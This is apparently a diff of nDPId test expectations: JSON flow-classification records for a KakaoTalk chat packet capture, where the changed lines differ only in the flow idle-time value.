00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":120000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00664{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00941{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1430069030121,"flow_last_seen":1430069041457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5586,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00664{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1430069022297,"flow_last_seen":1430069069068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":589,"flow_tot_l4_payload_len":2142,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00941{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1430069030121,"flow_last_seen":1430069041457,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5586,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022249,"flow_last_seen":1430069022282,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":29029,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022007,"flow_last_seen":1430069022042,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030557,"flow_last_seen":1430069030591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022094,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035398,"flow_last_seen":1430069048679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022006,"flow_last_seen":1430069022041,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1430069030751,"flow_last_seen":1430069031522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6399,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1430069031236,"flow_last_seen":1430069031782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7425,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1430069035967,"flow_last_seen":1430069036831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5965,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1430069026012,"flow_last_seen":1430069051765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1430069044758,"flow_last_seen":1430069069274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":1401,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1430069030751,"flow_last_seen":1430069031522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6399,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1430069031236,"flow_last_seen":1430069031782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7425,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 